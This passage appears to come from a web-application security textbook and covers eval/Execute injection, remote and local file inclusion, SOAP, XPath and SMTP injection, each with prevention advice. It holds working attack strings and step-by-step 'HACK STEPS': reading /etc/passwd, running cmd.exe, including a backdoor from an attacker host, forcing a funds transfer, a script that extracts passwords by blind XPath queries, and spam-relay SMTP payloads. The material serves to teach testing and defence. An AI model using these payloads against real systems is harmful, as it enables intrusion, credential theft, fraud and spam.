searches that are then dynamically generated as links within their user interface.

When users access the search function, they use a URL like the following:

https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh

The server-side application implements this functionality by dynamically generating variables containing the name/value pairs specified in the storedsearch parameter, in this case creating a mysearch variable with the value wahh:

$storedsearch = $_GET['storedsearch'];
eval("$storedsearch;");

In this situation, you can submit crafted input that is dynamically executed by the eval function, resulting in injection of arbitrary PHP commands into the server-side application. The semicolon character can be used to batch commands together in a single parameter. For example, to retrieve the contents of the file /etc/passwd, you could use either the file_get_contents or the system function:

https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh;%20echo%20file_get_contents('/etc/passwd')

https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh;%20system('cat%20/etc/passwd')

NOTE The Perl language also contains an eval function that can be exploited

in the same way. Note that the semicolon character may need to be URL-encoded

(as %3b) as some CGI script parsers interpret this as a parameter delimiter.

Dynamic Execution in ASP

The ASP function Execute works in the same way as the PHP eval function

and can be used to dynamically execute code that is passed to the function at

runtime.


The functionality described for the PHP application above could be implemented in ASP as follows:

dim storedsearch
storedsearch = Request("storedsearch")
Execute(storedsearch)

In this situation, an attacker can submit crafted input which results in injection of arbitrary ASP commands. In ASP, commands are normally delimited using newline characters, but multiple commands can be batched when passed to the Execute function using the colon character. For example, response.write can be used to print arbitrary data into the server’s response:

https://wahh-app.com/search.asp?storedsearch=mysearch%3dwahh:response.write%20111111111

The Wscript.Shell object can be used to access the operating system command shell. For example, the following ASP will perform a directory listing and store the results in a file within the web root:

Dim oScript
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Call oScript.Run ("cmd.exe /c dir > c:\inetpub\wwwroot\dir.txt",0,True)

This code can be passed to the vulnerable call to Execute by batching all of the commands as follows:

https://wahh-app.com/search.asp?storedsearch=mysearch%3dwahh:+Dim+oScript:+Set+oScript+=+Server.CreateObject("WSCRIPT.SHELL"):+Call+oScript.Run+("cmd.exe+/c+dir+>+c:\inetpub\wwwroot\dir.txt",0,True)

Finding Dynamic Execution Vulnerabilities

Most web scripting languages support dynamic execution, and the functions

involved all work in a similar way. Therefore, dynamic execution vulnerabili-

ties can in general be detected using a relatively small set of attack strings that

work on multiple languages and platforms. However, in some cases it may be

necessary to research the syntax and behavior of the particular implementa-

tion you are dealing with. For example, although Java does not itself support

dynamic execution, some custom implementations of the JSP platform may do

so. You should use the information gathered during your application mapping

exercises to investigate any unusual execution environments you encounter.


HACK STEPS

■ Any item of user-supplied data may be passed to a dynamic execution

function. Some of the items most commonly used in this way are the

names and values of cookie parameters, and persistent data stored in

user profiles as the result of previous actions.

■ Try submitting the following values in turn as each targeted parameter:

;echo%20111111

echo%20111111

response.write%20111111

:response.write%20111111

■ Review the application’s responses. If the string 111111 is returned on

its own (i.e., not preceded by the rest of the command string), then the

application is likely to be vulnerable to injection of scripting commands.

■ If the string 111111 is not returned, look for any error messages that

indicate that your input is being dynamically executed and that you may

need to fine-tune your syntax to achieve injection of arbitrary commands.

■ If the application you are attacking uses PHP, you can use the test string

phpinfo(), which if successful will return the configuration details of

the PHP environment.

■ If the application appears to be vulnerable, verify this by injecting some

commands that result in time delays, as described previously for OS com-

mand injection. For example:

system('ping%20127.0.0.1')
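The check for whether 111111 is returned on its own, rather than as part of your echoed input, can be sketched as follows. This is a rough Python illustration only: the function name marker_executed is hypothetical, and the sketch assumes that any echo of your input appears either exactly as submitted or in URL-decoded form. An application that HTML-encodes or otherwise transforms the echo would need additional handling.

```python
from urllib.parse import unquote


def marker_executed(body, payload, marker="111111"):
    """Return True if the marker appears outside any echo of the payload.

    body:    the text of the application's response.
    payload: the value that was submitted, e.g. ";echo%20111111".
    """
    # Remove verbatim echoes of the submitted value, raw and URL-decoded.
    for echoed in (payload, unquote(payload)):
        body = body.replace(echoed, "")
    # Whatever remains was not simply reflected back from the request.
    return marker in body
```

A result of True is a strong indication but not proof, which is why the final step above recommends confirming with a time delay.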

File Inclusion Vulnerabilities

Many scripting languages support the use of include files. This facility enables

developers to place reusable code components into individual files, and to

include these within function-specific code files as and when they are needed.

The code within the included file is interpreted just as if it had been inserted at

the location of the include directive.

Remote File Inclusion

The PHP language is particularly susceptible to file inclusion vulnerabilities

because its include function accepts a remote file path. This has been the basis

of numerous vulnerabilities in PHP applications.


Consider an application that delivers different content to people in different

locations. When users choose their location, this is communicated to the server

via a request parameter, as follows:

https://wahh-app.com/main.php?Country=US

The application processes the Country parameter as follows:

$country = $_GET['Country'];
include( $country . '.php' );

This causes the execution environment to load the file US.php that is located on the web server file system. The contents of this file are effectively copied into the main.php file, and executed.

An attacker can exploit this behavior in different ways, the most serious of

which is to specify an external URL as the location of the include file. The PHP

include function accepts this as input, and the execution environment will

retrieve the specified file and execute its contents. Hence, an attacker can con-

struct a malicious script containing arbitrarily complex content, host this on a

web server he controls, and invoke it for execution via the vulnerable applica-

tion function. For example:

https://wahh-app.com/main.php?Country=http://wahh-attacker.com/backdoor

Local File Inclusion

In some cases, include files are loaded on the basis of user-controllable data, but it is not possible to specify a URL to a file on an external server. For example, if user-controllable data is passed to the ASP function Server.Execute, then an attacker may be able to cause an arbitrary ASP script to be executed, provided that this script belongs to the same application as the one that is calling the function.

In this situation, you may still be able to exploit the application’s behavior to

perform unauthorized actions:

■■ There may be server-executable files on the server that you cannot access through the normal route. For example, any requests to the path /admin may be blocked through application-wide access controls. If you can cause sensitive functionality to be included into a page that you are authorized to access, then you may be able to gain access to that functionality.

■■ There may be static resources on the server that are similarly protected from direct access. If you can cause these to be dynamically included into other application pages, then the execution environment will typically simply copy the contents of the static resource into its response.


Finding File Inclusion Vulnerabilities

File inclusion vulnerabilities may arise in relation to any item of user-supplied

data. They are particularly common in request parameters that specify a lan-

guage or location, and also often arise when the name of a server-side file is

passed explicitly as a parameter.

HACK STEPS

To test for remote file inclusion flaws, perform the following steps:

■ Submit in each targeted parameter a URL for a resource on a web server

that you control, and determine whether any requests are received from

the server hosting the target application.

■ If the first test fails, try submitting a URL containing a nonexistent IP

address, and determine whether a timeout occurs while the server

attempts to connect.

■ If the application is found to be vulnerable to remote file inclusion, con-

struct a malicious script using the available APIs in the relevant lan-

guage, as described for dynamic execution attacks.

Local file inclusion vulnerabilities can potentially exist in a much wider range

of scripting environments than those that support remote file inclusion. To test

for local file inclusion vulnerabilities, perform the following steps:

■ Submit the name of a known executable resource on the server, and

determine whether there is any change in the application’s behavior.

■ Submit the name of a known static resource on the server, and determine

whether its contents are copied into the application’s response.

■ If the application is vulnerable to local file inclusion, attempt to access

any sensitive functionality or resources that you cannot reach directly via

the web server.

Preventing Script Injection Vulnerabilities

In general, the best way to avoid script injection vulnerabilities is to not pass

user-supplied input, or data derived from it, into any dynamic execution or

include functions. If this is considered to be unavoidable for some reason, then

the relevant input should be strictly validated to prevent any attack occurring.

If possible, use a white list of known good values (such as a list of all the lan-

guages or locations supported by the application), and reject any input that

does not appear on this list. Failing that, check the characters used within the

input against a set known to be harmless, such as alphanumeric characters

excluding whitespace.
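The white-list approach can be illustrated with a short sketch. It is written in Python for brevity, and the country codes, file names, and the function name resolve_include are hypothetical. The point is that the user's input is only ever used as a lookup key, and the file name that reaches the include mechanism is always one the developer wrote.

```python
# Hypothetical list of locations supported by the application.
ALLOWED_COUNTRIES = {
    "US": "US.php",
    "UK": "UK.php",
    "DE": "DE.php",
}


def resolve_include(country):
    """Map a user-supplied country code to a known include file.

    Anything not on the list is rejected, so URLs, path traversal
    sequences, and unexpected file names never reach the include call.
    """
    try:
        return ALLOWED_COUNTRIES[country]
    except KeyError:
        raise ValueError("unsupported country") from None
```

Because the returned value comes from the table and not from the request, no further character filtering of the file name is needed.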


Injecting into SOAP

The Simple Object Access Protocol (SOAP) is a message-based communica-

tions technology that uses the XML format to encapsulate data. It can be used

to share information and transmit messages between systems, even if these

run on different operating systems and architectures. Its primary use is in web

services, and in the context of a browser-accessed web application, you are

most likely to encounter SOAP in the communications that occur between

back-end application components.

SOAP is often used in large-scale enterprise applications where individual

tasks are performed by different computers to improve performance. It is also

often found where a web application has been deployed as a front end to an

existing application. In this situation, communications between different

components may be implemented using SOAP to ensure modularity and

interoperability.

Because XML is an interpreted language, SOAP is potentially vulnerable to code injection in a similar way to the other examples already described. XML elements are represented syntactically, using the metacharacters <, >, and /. If user-supplied data containing these characters is inserted directly into a SOAP message, an attacker may be able to interfere with the structure of the message and so interfere with the application’s logic or cause other undesirable effects.

Consider a banking application in which a user initiates a funds transfer

using an HTTP request like the following:

POST /transfer.asp HTTP/1.0

Host: wahh-bank.com

Content-Length: 65

FromAccount=18281008&Amount=1430&ToAccount=08447656&Submit=Submit

In the course of processing this request, the following SOAP message is sent

between two of the application’s back-end components:

<soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap-envelope">
  <soap:Body>
    <pre:Add xmlns:pre="http://target/lists" soap:encodingStyle="http://www.w3.org/2001/12/soap-encoding">
      <Account>
        <FromAccount>18281008</FromAccount>
        <Amount>1430</Amount>
        <ClearedFunds>False</ClearedFunds>
        <ToAccount>08447656</ToAccount>
      </Account>
    </pre:Add>
  </soap:Body>
</soap:Envelope>


Note how the XML elements in the message correspond to the parameters in the HTTP request, and also the addition of the ClearedFunds element. At this point in the application’s logic, it has determined that there are insufficient funds available to perform the requested transfer, and has set the value of this element to False, with the result that the component which receives the SOAP message does not act upon it.

In this situation, there are various ways in which you could seek to inject into the SOAP message, and so interfere with the application’s logic. For example, submitting the following request will cause an additional ClearedFunds element to be inserted into the message before the original element (while preserving the XML’s syntactic validity). If the application processes the first ClearedFunds element that it encounters, then you may succeed in performing a transfer when no funds are available:

POST /transfer.asp HTTP/1.0

Host: wahh-bank.com

Content-Length: 119

FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True

</ClearedFunds><Amount>1430&ToAccount=08447656&Submit=Submit

If, on the other hand, the application processes the last ClearedFunds element that it encounters, you could inject a similar attack into the ToAccount parameter.
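The effect of the first attack can be reproduced with a small sketch. It assumes that the back-end component builds the Account element by plain string concatenation, with FromAccount, Amount, ClearedFunds, and ToAccount in that order, which is what the injection examples imply. The function names are hypothetical, and the SOAP envelope is omitted to keep the example short.

```python
import xml.etree.ElementTree as ET

# Assumed layout of the Account element inside the SOAP body.
TEMPLATE = (
    "<Account>"
    "<FromAccount>{from_account}</FromAccount>"
    "<Amount>{amount}</Amount>"
    "<ClearedFunds>False</ClearedFunds>"
    "<ToAccount>{to_account}</ToAccount>"
    "</Account>"
)


def build_fragment(from_account, amount, to_account):
    """Unsafe: inserts request parameters into the XML with no encoding."""
    return TEMPLATE.format(
        from_account=from_account, amount=amount, to_account=to_account
    )


def first_cleared_funds(fragment):
    """Return the value of the first ClearedFunds element, as a receiving
    component that reads only the first match would see it."""
    return ET.fromstring(fragment).find("ClearedFunds").text


attack = "1430</Amount><ClearedFunds>True</ClearedFunds><Amount>1430"
injected = build_fragment("18281008", attack, "08447656")
```

Parsing the injected fragment succeeds because the crafted Amount value closes and reopens the Amount element, and first_cleared_funds(injected) yields the attacker's value rather than the one set by the application.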

A different type of attack would be to use XML comments to remove part of the original SOAP message altogether, and replace the removed elements with your own. For example, the following request injects a ClearedFunds element via the Amount parameter, provides the opening tag for the ToAccount element, opens a comment, and closes the comment in the ToAccount parameter, thus preserving the syntactic validity of the XML:

POST /transfer.asp HTTP/1.0

Host: wahh-bank.com

Content-Length: 125

FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True
</ClearedFunds><ToAccount><!--&ToAccount=-->08447656&Submit=Submit

A further type of attack would be to attempt to complete the entire SOAP

message from within an injected parameter and comment out the remainder of

the message. However, because the opening comment will not be matched by

a closing comment, this attack produces strictly invalid XML, which will be

rejected by many XML parsers:

POST /transfer.asp HTTP/1.0

Host: wahh-bank.com

Content-Length: 176

FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFund

s><ToAccount>08447656</ToAccount></Account></pre:Add></soap:Body></soap:

Envelope><!--&Submit=Submit

Finding and Exploiting SOAP Injection

SOAP injection can be difficult to detect, because supplying XML metacharac-

ters in a noncrafted way will break the format of the SOAP message, and this

will often simply result in an uninformative error message. Nevertheless, the

following steps can be used to detect SOAP injection vulnerabilities with a

degree of reliability.

HACK STEPS

■ Submit a rogue XML closing tag such as </foo> in each parameter in

turn. If no error occurs, your input is probably not being inserted into a

SOAP message, or is being sanitized in some way.

■ If an error was received, submit instead a valid opening and closing tag

pair, such as <foo></foo>. If this causes the error to disappear, then the

application may well be vulnerable.

■ In some situations, data that is inserted into an XML-formatted message

is subsequently read back from its XML form and returned to the user. If

the item you are modifying is being returned in the application’s

responses, see whether any XML content you submit is returned in its

identical form, or has been normalized in some way. Submit the follow-

ing two values in turn:

test<foo/>

test<foo></foo>

If you find that either item is returned as the other, or simply as test, then

you can be confident that your input is being inserted into an XML-based

message.

■ If the HTTP request contains several parameters which may be being placed into a SOAP message, try inserting the opening comment character <!-- into one parameter and the closing comment character --> into another parameter. Then, switch these around (because you have no way of knowing which order the parameters appear in). This can have the effect of commenting out a portion of the server’s SOAP message, which may cause a change in the application’s logic, or result in a different error condition which may divulge information.


If SOAP injection is difficult to detect, then it can be even harder to exploit.

In most situations, you will need to know the structure of the XML that sur-

rounds your data, in order to supply crafted input which modifies the message

without invalidating it. In all of the preceding tests, look for any error mes-

sages that reveal any details about the SOAP message being processed. If you

are lucky, a verbose message will disclose the entire message, enabling you to

construct crafted values to exploit the vulnerability. If you are unlucky, you

may be restricted to pure guesswork, which is very unlikely to be successful.

Preventing SOAP Injection

SOAP injection can be prevented by employing boundary validation filters at

any point where user-supplied data is inserted into a SOAP message (see

Chapter 2). This should be performed both on data that has been immediately

received from the user in the current request and on any data which has been

persisted from earlier requests or generated from other processing that takes

user data as input.

To prevent the attacks described, the application should HTML-encode any

XML metacharacters appearing in user input. HTML-encoding involves

replacing literal characters with their corresponding HTML entities. This

ensures that the XML interpreter will treat them as part of the data value of the

relevant element, and not as part of the structure of the message itself. The

HTML-encodings of some common problematic characters are:

< &lt;

> &gt;

/ &#47;
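As a rough illustration of this encoding, the following Python sketch uses the standard library function xml.sax.saxutils.escape, which replaces &, <, and > with entities and accepts a dictionary of extra replacements, used here for the / character. The function names and the cut-down Account element are assumptions made for the example, not the application's actual code.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape


def amount_element(amount):
    """Build the Amount element with XML metacharacters encoded."""
    # escape() handles &, < and >; the extra entry also encodes "/".
    return "<Amount>" + escape(amount, {"/": "&#47;"}) + "</Amount>"


def parse_account(amount):
    """Parse a cut-down Account element and report what the parser sees."""
    document = (
        "<Account>"
        + amount_element(amount)
        + "<ClearedFunds>False</ClearedFunds>"
        + "</Account>"
    )
    root = ET.fromstring(document)
    return [child.tag for child in root], root.find("Amount").text


attack = "1430</Amount><ClearedFunds>True</ClearedFunds><Amount>1430"
tags, value = parse_account(attack)
```

With the encoding in place, the parser sees only the two original elements, and the whole attack string is treated as the data value of Amount, where ordinary input validation can reject it as a non-numeric amount.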

Injecting into XPath

The XML Path Language (or XPath) is an interpreted language used for navi-

gating around XML documents, and for retrieving data from within them. In

most cases, an XPath expression represents a sequence of steps that is required

to navigate from one node of a document to another.

Where web applications store data within XML documents, they may use

XPath to access the data in response to user-supplied input. If this input is

inserted into the XPath query without any filtering or sanitization, then an

attacker may be able to manipulate the query to interfere with the applica-

tion’s logic or retrieve data for which she is not authorized.

XML documents are not generally a preferred vehicle for storing enterprise

data. However, they are frequently used to store application configuration

data that may be retrieved on the basis of user input. They may also be used by

smaller applications to persist simple information such as user credentials,

roles, and privileges.

Consider the following XML data store:

<addressBook>
  <address>
    <firstName>William</firstName>
    <surname>Gates</surname>
    <password>MSRocks!</password>
    <email>[email protected]</email>
  </address>
  <address>
    <firstName>Chris</firstName>
    <surname>Dawes</surname>
    <password>secret</password>
    <email>[email protected]</email>
  </address>
  <address>
    <firstName>James</firstName>
    <surname>Hunter</surname>
    <password>letmein</password>
    <email>[email protected]</email>
  </address>
</addressBook>

An XPath query to retrieve all email addresses would look like the following:

//address/email/text()

A query to return all of the details of the user Dawes would be:

//address[surname/text()='Dawes']

In some applications, user-supplied data may be embedded directly into

XPath queries, and the results of the query may be returned in the applica-

tion’s response or used to determine some aspect of the application’s behavior.

Subverting Application Logic

Consider an application function that retrieves a user’s stored credit card

number based on a username and password. The following XPath query effec-

tively verifies the user-supplied credentials and retrieves the relevant user’s

credit card number:

//address[surname/text()='Dawes' and password/text()='secret']/ccard/text()


In this case, an attacker may be able to subvert the application’s query in an identical way to a SQL injection flaw. For example, supplying a password with the value

' or 'a'='a

will result in the following XPath query, which will retrieve the credit card details of all users:

//address[surname/text()='Dawes' and password/text()='' or 'a'='a']/ccard/text()

NOTE

■■ As with SQL injection, single quotation marks are not required when injecting into a numeric value.

■■ Unlike SQL queries, keywords in XPath queries are case sensitive, as are the element names in the XML document itself.

Informed XPath Injection

XPath injection flaws can be exploited to retrieve arbitrary information from

within the target XML document. One reliable way of doing this uses the same

technique as was described for SQL injection, of causing the application to

respond in different ways contingent upon a condition specified by the

attacker.

Submitting the following two passwords will result in different behavior by

the application — results will be returned in the first case but not in the second:

' or 1=1 and 'a'='a

' or 1=2 and 'a'='a

This difference in behavior can be leveraged to test the truth of any specified

condition and, therefore, extract arbitrary information one byte at a time. As

with SQL, the XPath language contains a substring function, which can be

used to test the value of a string one character at a time. For example, supply-

ing the password

' or //address[surname/text()='Gates' and substring(password/text(),1,1)='M'] and 'a'='a

will result in the following XPath query, which will return results if the first character of the Gates user’s password is M:

//address[surname/text()='Dawes' and password/text()='' or //address[surname/text()='Gates' and substring(password/text(),1,1)='M'] and 'a'='a']/ccard/text()


By cycling through each character position, and testing each possible value,

an attacker can extract the full value of Gates’s password.
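The cycling procedure can be sketched as a pair of nested loops. The Python below is a minimal illustration under stated assumptions: returns_results is a hypothetical callable that you would supply yourself, which submits a password value to the application and reports whether results came back. The function names, the candidate alphabet, and the maximum length are arbitrary choices for the example.

```python
import string


def build_condition(surname, position, candidate):
    """Build the injected password value that tests one character."""
    return (
        "' or //address[surname/text()='{0}' and "
        "substring(password/text(),{1},1)='{2}'] and 'a'='a"
    ).format(surname, position, candidate)


def extract_password(returns_results, surname, max_length=32,
                     alphabet=string.ascii_letters + string.digits + "!"):
    """Recover a password one character at a time.

    returns_results: callable taking an injected password string and
    returning True if the application returned results (assumed to be
    provided by the tester; it stands in for sending the request).
    """
    recovered = ""
    for position in range(1, max_length + 1):  # XPath positions start at 1
        for candidate in alphabet:
            if returns_results(build_condition(surname, position, candidate)):
                recovered += candidate
                break
        else:
            break  # no candidate matched, so the end of the value was reached
    return recovered
```

The candidate alphabet deliberately excludes the single quotation mark, because a quote inside the injected value would break the syntax of the surrounding query. Characters outside the chosen alphabet cause the loop to stop early, so in practice the alphabet needs to cover every character you expect to encounter.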

Blind XPath Injection

In the attack just described, the injected test condition specified both the absolute path to the extracted data (address) and the names of the targeted fields (surname and password). In fact, it is possible to mount a fully blind

attack without possessing this information. XPath queries can contain steps

that are relative to the current node within the XML document, so from the

current node it is possible to navigate to the parent node or to a specific child

node. Further, XPath contains functions to query meta-information about the

document, including the name of a specific element. Using these techniques, it

is possible to extract the names and values of all nodes within the document

without knowing any prior information about its structure or contents.

For example, you can use the substring technique described previously to

extract the name of the current node’s parent, by supplying a series of pass-

words of the form:

' or substring(name(parent::*[position()=1]),1,1)='a

This input generates results, because the first letter of the address node is a. Moving on to the second letter, you can confirm that this is d by supplying the following passwords, the last of which generates results:

' or substring(name(parent::*[position()=1]),2,1)='a

' or substring(name(parent::*[position()=1]),2,1)='b

' or substring(name(parent::*[position()=1]),2,1)='c

' or substring(name(parent::*[position()=1]),2,1)='d

Having established the name of the address node, you can then cycle through each of its child nodes, extracting all of their names and values. Specifying the relevant child node by index avoids the need to know the names of any nodes. For example, the following query will return the value Hunter:

//address[position()=3]/child::node()[position()=4]/text()

And the following query will return the value letmein:

//address[position()=3]/child::node()[position()=6]/text()

This technique can be used in a completely blind attack, where no results are

returned within the application’s responses, by crafting an injected condition

that specifies the target node by index. For example, supplying the following

password will return results if the first character of Gates’s password is M:

' or substring(//address[position()=1]/child::node()[position()=6]/text(),1,1)='M' and 'a'='a


By cycling through every child node of every address node, and extracting

their values one character at a time, you can extract the entire contents of the

XML data store.

TIP XPath contains two useful functions that can help you automate the

above attack and quickly iterate through all nodes and data in the XML

document:

■ count(): This returns the number of child nodes of a given element,

which can be used to determine the range of position() values to

iterate over.

■ string-length(): This returns the length of a supplied string,

which can be used to determine the range of substring() values to

iterate over.
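
The extraction loop described above can be automated along the following lines. This is a minimal Python sketch rather than a finished tool: it assumes you supply an oracle callable (hypothetical) that submits a boolean XPath condition to the application, for example wrapped by password_payload(), and returns True when the application returns results. The names extract_string, xpath_literal, and password_payload are illustrative and do not belong to any library.

```python
import string
from typing import Callable, Optional

# Candidate characters to try at each position (an assumption; widen as needed).
CHARSET = string.ascii_letters + string.digits + string.punctuation


def xpath_literal(ch: str) -> str:
    """Quote one character as an XPath 1.0 string literal.

    XPath 1.0 has no escape sequences, so an apostrophe is wrapped in
    double quotes and every other character in single quotes.
    """
    return f'"{ch}"' if ch == "'" else f"'{ch}'"


def password_payload(condition: str) -> str:
    """Wrap a boolean condition in the injected password form shown above."""
    return f"' or {condition} and 'a'='a"


def extract_string(oracle: Callable[[str], bool], expr: str,
                   max_len: int = 64, charset: str = CHARSET) -> Optional[str]:
    """Recover the string value of expr using only true/false responses."""
    # Step 1: string-length() tells us how many positions to iterate over.
    length = next((n for n in range(max_len + 1)
                   if oracle(f"string-length({expr})={n}")), None)
    if length is None:
        return None
    # Step 2: substring() tests each position against each candidate character.
    chars = []
    for pos in range(1, length + 1):
        hit = next((c for c in charset
                    if oracle(f"substring({expr},{pos},1)={xpath_literal(c)}")), "?")
        chars.append(hit)
    return "".join(chars)
```

A typical call would pass an indexed path such as //address[position()=1]/child::node()[position()=6]/text() as expr. Positions for which no candidate matches are reported as "?", which usually means the character set needs widening.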

Finding XPath Injection Flaws

Many of the attack strings that are commonly used to probe for SQL injection

flaws will typically result in anomalous behavior when submitted to a

function that is vulnerable to XPath injection. For example, either of the following

two strings will normally invalidate the XPath query syntax and so generate

an error:

'

'--

One or more of the following strings will typically result in some change in

the application’s behavior without causing an error, in the same way as they

do in relation to SQL injection flaws:

' or 'a'='a

' and 'a'='b

or 1=1

and 1=2

Hence, in any situation where your tests for SQL injection provide tentative

evidence for a vulnerability, but you are unable to conclusively exploit the

flaw, you should investigate the possibility that you are dealing with an XPath

injection flaw.


HACK STEPS

■ Try submitting the following values, and determine whether these result

in different application behavior, without causing an error:

' or count(parent::*[position()=1])=0 or 'a'='b

' or count(parent::*[position()=1])>0 or 'a'='b

■ If the parameter is numeric, also try the following test strings:

1 or count(parent::*[position()=1])=0

1 or count(parent::*[position()=1])>0

■ If any of the preceding strings causes differential behavior within the

application without causing an error, it is likely that you can extract

arbitrary data by crafting test conditions to extract one byte of information at

a time. Use a series of conditions with the following form to determine

the name of the current node’s parent:

substring(name(parent::*[position()=1]),1,1)='a'

■ Having extracted the name of the parent node, use a series of conditions

with the following form to extract all of the data within the XML tree:

substring(//parentnodename[position()=1]/child::node()[position()=1]/text(),1,1)='a'

Preventing XPath Injection

If it is felt necessary to insert user-supplied input into an XPath query, this

operation should only be performed on simple items of data which can be

subjected to strict input validation. The user input should be checked against a

white list of acceptable characters, which should ideally include only

alphanumeric characters. Characters that may be used to interfere with the XPath

query should be blocked, including ( ) = ' [ ] : , * / and all whitespace.

Any input that does not match the white list should be rejected, not sanitized.
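
As a rough illustration of this advice, the following Python sketch accepts only ASCII letters and digits and rejects everything else outright. The function name validate_xpath_input is hypothetical, and the alphanumeric-only rule is the "ideal" case described above; a real application may need a slightly wider white list.

```python
import re

# White list: ASCII letters and digits only.
_ALNUM = re.compile(r"[A-Za-z0-9]+")


def validate_xpath_input(value: str) -> str:
    """Return value unchanged if it passes the white list; otherwise reject it."""
    if not _ALNUM.fullmatch(value):
        # Reject outright instead of trying to strip or escape bad characters.
        raise ValueError("input contains characters outside the white list")
    return value
```

Because fullmatch() must consume the whole string, none of the blocked characters listed above, and no whitespace or empty input, can pass.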

Injecting into SMTP

Many applications contain a facility for users to submit messages via the

application; for example, to report a problem to support personnel or provide

feedback about the web site. This facility is usually implemented by interfacing with

a mail (or SMTP) server. Typically, user-supplied input will be inserted into the

SMTP conversation that the application server conducts with the mail server. If

an attacker can submit suitably crafted input that is not filtered or sanitized, he

may be able to inject arbitrary SMTP commands into this conversation.

In most cases, the application will enable you to specify the contents of the

message and your own email address (which is inserted into the From field of

the resulting email). You may also be able to specify the subject of the message

and other details. Any relevant field that you control may be vulnerable to

SMTP injection.

SMTP injection vulnerabilities are often exploited by spammers who scan

the Internet for vulnerable mail forms and use these to generate large volumes

of nuisance email.

Email Header Manipulation

Consider the form shown in Figure 9-7, which allows users to send feedback

about the application.

Figure 9-7: A typical site feedback form

Here, users can specify a From address and the contents of the message. The

application passes this input to the PHP mail() command, which constructs

the email and performs the necessary SMTP conversation with its configured

mail server. The mail generated is as follows:

To: [email protected]

From: [email protected]

Subject: Site problem

Confirm Order page doesn’t load

The PHP mail() command uses an additional_headers parameter to set

the From address for the message. This parameter is also used to specify other

headers, including Cc and Bcc, by separating each required header with a

newline character. Hence, an attacker can cause the message to be sent to

arbitrary recipients by injecting one of these headers into the From field, as

illustrated in Figure 9-8.


Figure 9-8: An email header injection attack

This causes the mail() command to generate the following message:

To: [email protected]

From: [email protected]

Bcc: [email protected]

Subject: Site problem

Confirm Order page doesn’t load
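
The effect of the injected newline can be reproduced with a small Python model. This is not PHP's mail() implementation; it is a simplified sketch that assumes the headers are assembled by plain string concatenation, and the function name build_mail_naive and all addresses are hypothetical.

```python
from email import message_from_string


def build_mail_naive(to_addr: str, from_addr: str, subject: str, body: str) -> str:
    """Assemble a raw message by string concatenation, with no validation.

    This mimics, in simplified form, what happens when a user-controlled
    From value is placed into a block of newline-separated headers.
    """
    headers = (f"To: {to_addr}\r\n"
               f"From: {from_addr}\r\n"
               f"Subject: {subject}\r\n")
    return headers + "\r\n" + body


# Hypothetical addresses, used only for illustration.
injected_from = "attacker@example.com\r\nBcc: victim@example.org"
raw = build_mail_naive("feedback@example.com", injected_from,
                       "Site problem", "Confirm Order page doesn't load")

# Parsing the result shows that mail software would see an extra header.
parsed = message_from_string(raw)
print(parsed["From"])  # the address supplied before the injected newline
print(parsed["Bcc"])   # the injected recipient
```

The From field supplied by the attacker is a single form value, yet the parsed message contains two separate headers.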

SMTP Command Injection

In other cases, the application may perform the SMTP conversation itself, or

may pass user-supplied input to a different component in order to do this. In

this situation, it may be possible to inject arbitrary SMTP commands directly

into this conversation, potentially taking full control of the messages being

generated by the application.

For example, consider an application that uses requests of the following

form to submit site feedback:

POST /feedback.php HTTP/1.1

Host: wahh-app.com

Content-Length: 56

[email protected]&Subject=Site+feedback&Message=foo

This causes the web application to perform an SMTP conversation with the

following commands:

MAIL FROM: [email protected]

RCPT TO: [email protected]

DATA

From: [email protected]

To: [email protected]

Subject: Site feedback

foo

.


NOTE After the SMTP client issues the DATA command, it sends the contents

of the email message, comprising the message headers and body, and then

sends a single dot character on its own line. This tells the server that the

message is complete, and the client can then issue further SMTP commands, to

send further messages.

In this situation, you may be able to inject arbitrary SMTP commands into

any of the email fields that you control. For example, you can attempt to inject

into the Subject field as follows:

POST /feedback.php HTTP/1.1

Host: wahh-app.com

Content-Length: 266

[email protected]&Subject=Site+feedback%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:[email protected]%0d%0aRCPT+TO:+john@wahh-mail.com%0d%0aDATA%0d%0aFrom:[email protected]%0d%0aTo:+john@wahh-mail.com%0d%0aSubject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Message=foo

If the application is vulnerable, then this will result in the following SMTP

conversation, which generates two different email messages, with the second

being entirely within your control:

MAIL FROM: [email protected]

RCPT TO: [email protected]

DATA

From: [email protected]

To: [email protected]

Subject: Site feedback

foo

.

MAIL FROM: [email protected]

RCPT TO: [email protected]

DATA

From: [email protected]

To: [email protected]

Subject: Cheap V1AGR4

Blah

.

foo

.
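
To see why the injected Subject value splits into separate SMTP lines, it helps to decode it the way a web framework would. The Python sketch below uses a payload modeled on the request above, with hypothetical example.com and example.org addresses substituted; it only decodes and prints the lines and does not talk to a mail server.

```python
from urllib.parse import unquote_plus

# Injected Subject value, modeled on the request above (addresses are hypothetical).
subject = ("Site+feedback%0d%0afoo%0d%0a%2e%0d%0a"
           "MAIL+FROM:+mail@example.com%0d%0a"
           "RCPT+TO:+john@example.org%0d%0a"
           "DATA%0d%0a"
           "From:+mail@example.com%0d%0a"
           "To:+john@example.org%0d%0a"
           "Subject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a")

# URL-decode the value, then split on CRLF to see the individual lines that
# would end up in the SMTP conversation if the value is used unfiltered.
smtp_lines = unquote_plus(subject).split("\r\n")
for line in smtp_lines:
    print(repr(line))
```

The third decoded line is a lone dot, which ends the first message; everything after it is read by the mail server as new commands.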

Finding SMTP Injection Flaws

To probe an application’s mail functionality effectively, you need to target

every parameter that is submitted to an email-related function, even those that

may initially appear to be unrelated to the content of the generated message.


You should also test for each kind of attack, and you should perform each test

case using both Windows and Unix-style newline characters.

HACK STEPS

■ You should submit each of the following test strings as each parameter in

turn, inserting your own email address at the relevant position:

%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+test%0afoo%0a%2e%0a

